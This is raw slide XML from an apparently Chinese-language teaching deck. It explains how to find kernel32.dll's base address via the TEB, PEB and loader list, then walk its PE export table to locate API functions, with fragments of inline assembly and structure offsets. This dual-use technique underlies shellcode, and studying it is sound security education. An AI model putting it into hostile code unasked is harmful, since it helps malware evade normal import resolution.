              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>lodsd</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>,[eax+0x08];</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>kernel32.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的地址</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> 0;</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>}</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0946"/>
            <a:ext cx="4824536" cy="371961"/>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获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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kernel32.dll</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的基地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2E2779C-4759-04C4-2A31-A8FF80980C5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793642" y="1155219"/>
            <a:ext cx="372653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定位</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>kernel32.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>示例代码</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902C0236-D2DE-BB72-4E75-278241531DFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6456363" y="3317864"/>
            <a:ext cx="4826000" cy="546100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6906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二</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 altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>kernel32.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的导出表</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3" name="组合 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC1E6FBB-704F-4DA4-6EB1-B6AAA74DAF5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="927740" y="2290620"/>
            <a:ext cx="10359374" cy="885169"/>
            <a:chOff x="-10772707" y="1052512"/>
            <a:chExt cx="21633244" cy="885169"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="矩形 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37629905-4BEB-B69D-1403-4952745F329F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-10772707" y="1052513"/>
              <a:ext cx="1510925" cy="88516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F4378390-4E52-C658-8F91-FD6EBD797488}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-9261780" y="1052512"/>
              <a:ext cx="20122317" cy="88516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从</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加载基址算起，偏移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x3c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的地方就是其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头的指针</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="组合 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93D02888-4A05-7C44-8237-01F4B4012389}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="927740" y="3292389"/>
            <a:ext cx="10359374" cy="883909"/>
            <a:chOff x="-10772707" y="765386"/>
            <a:chExt cx="21633244" cy="883909"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="矩形 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{720C1F86-A12B-C397-8441-7E4ADD4C3D95}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-10772707" y="765386"/>
              <a:ext cx="1510925" cy="88390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F8F097E8-BBB2-6CE2-73D4-B12B5F3632A5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-9261780" y="765386"/>
              <a:ext cx="20122317" cy="88390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头偏移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x78</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的地方存放着指向函数导出表的指针</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="组合 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE12AC25-A14E-28D2-6C88-5701BF6F4A04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="927740" y="4292898"/>
            <a:ext cx="10359374" cy="1250124"/>
            <a:chOff x="-10772707" y="1050004"/>
            <a:chExt cx="21633244" cy="1250124"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="矩形 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23710B4A-5966-6226-AFBA-4223F26EFB05}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-10772707" y="1050004"/>
              <a:ext cx="1510925" cy="1247616"/>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3</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3653628E-9FD2-9067-F603-A82CF2E1A761}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-9261780" y="1052512"/>
              <a:ext cx="20122317" cy="1247616"/>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获得导出函数偏移地址（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列表、导出函数名列表：</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导出表偏移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x1c</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处的指针指向存储导出函数偏移地址（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的列表</a:t>
              </a:r>
            </a:p>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导出表偏移</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0</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x20</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处的指针指向存储导出函数函数名的列表</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97A419E2-6B1A-ED7C-309C-2805285096BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="927740" y="1211655"/>
            <a:ext cx="10359374" cy="753220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pP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找到了</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kernel32.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="e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由于它也是属于</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PE</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文件，那么我们可以根据</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PE</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文件的结构特征，定位其导出表，进而定位导出函数列表信息，然后进行解析、遍历搜索，找到我们所需要的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN"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API</a:t>
            </a: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函数。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21000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二</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 altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>kernel32.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的导出表</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43928A29-41E7-E367-3322-F1BAED3EC92F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1880153" y="142582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FS</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13" name="组合 112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA5E9735-DDCC-6E56-9BFD-4B13902B3ACA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2725958" y="1425820"/>
            <a:ext cx="1404307" cy="353863"/>
            <a:chOff x="1583023" y="1152799"/>
            <a:chExt cx="1404307" cy="353863"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{831486B1-E2E2-7251-1E9C-B70E42B7837D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="158302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TEB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52D3621C-6D49-326C-361C-B441A2744C97}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="213781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0x30</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C869526-303E-4EA9-A2F0-34900BB9ACA1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2692603" y="1152799"/>
              <a:ext cx="294727" cy="353863"/>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2" name="组合 111">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{814D7254-4B9F-F347-6758-A3F1C1610915}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4421280" y="1425245"/>
            <a:ext cx="1417630" cy="355012"/>
            <a:chOff x="3129918" y="1149276"/>
            <a:chExt cx="1417630" cy="355012"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="矩形 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AC452E7-7C58-1557-74C8-D239979D130C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3129918" y="1149276"/>
              <a:ext cx="55479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PEB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F099DD95-EC3D-B700-E3AE-2897E461D1F5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3684708" y="1149276"/>
              <a:ext cx="579781"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E787586B-844F-A740-3041-DE418889155C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4262785" y="1149276"/>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1" name="组合 110">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DD048E3-0CBB-EA3D-60D4-F02FAB09888D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6129925" y="1425245"/>
            <a:ext cx="1441656" cy="355012"/>
            <a:chOff x="4672390" y="1149276"/>
            <a:chExt cx="1441656" cy="355012"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="矩形 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6E249C4-0243-20EA-6B05-F668EE2F125B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4672390"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LDR</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8" name="矩形 37">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A3ACD72-B4C7-8D2E-3DBD-1F89BE8402B9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5257552"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0x1C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C08473DF-8815-A3E0-0336-008E7D172E1A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5831830" y="1149276"/>
              <a:ext cx="282216"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08" name="组合 107">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E5D6786-FD90-75C5-A23A-6BA4C52A8A76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9250048" y="1425245"/>
            <a:ext cx="1995761" cy="355012"/>
            <a:chOff x="9250048" y="1409252"/>
            <a:chExt cx="1995761" cy="355012"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="矩形 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55B35A1D-467C-3201-FF49-D86B6E77D49C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9250048" y="1409252"/>
              <a:ext cx="12588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A4DC0895-0ABC-CF08-3D69-0C12C3495F72}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10959581" y="1409252"/>
              <a:ext cx="2862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9" name="矩形 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC8F65C3-20FA-73B7-62C9-F9EFEA80738F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10508876" y="1409252"/>
              <a:ext cx="450705"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0x8</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74" name="矩形 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47A82BED-36EC-B329-3FD5-824CF5381C1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6709702" y="3720629"/>
            <a:ext cx="1850165" cy="6159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函数地址列表</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76" name="直线箭头连接符 75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5589AC2-806F-069B-9B19-CD3E8A87FE19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="14" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2311424" y="1602752"/>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FA60A427-D4AB-8B91-D124-96DA45D7B63D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7862596" y="1425245"/>
            <a:ext cx="1096440" cy="355012"/>
            <a:chOff x="7752184" y="1409252"/>
            <a:chExt cx="1096440" cy="355012"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="矩形 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDA27784-287C-E7F7-6B0A-650A505F64BB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7752184" y="1409252"/>
              <a:ext cx="80974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rPr>
                <a:t>ntdll.dll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3" name="矩形 82">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{491D5E4B-3C12-B1BA-565D-791EE4D4FFAF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8563861" y="1409252"/>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21" name="组合 120">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD318104-8C90-7961-C6B1-DF7B13758D9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5030899" y="2573759"/>
            <a:ext cx="1417387" cy="355010"/>
            <a:chOff x="4540570" y="2334970"/>
            <a:chExt cx="1417387" cy="355010"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="68" name="矩形 67">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7D0EC84-30AB-3C8F-D3C9-06C4CE5ED78B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4540570" y="2337301"/>
              <a:ext cx="575222"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头</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="69" name="矩形 68">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C3E069F-8BE6-111B-75D7-999C239A51D5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5115792" y="2337302"/>
              <a:ext cx="575216"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0x78</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7" name="矩形 86">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41CACE94-1D8B-6069-0E34-560BF8874DB8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
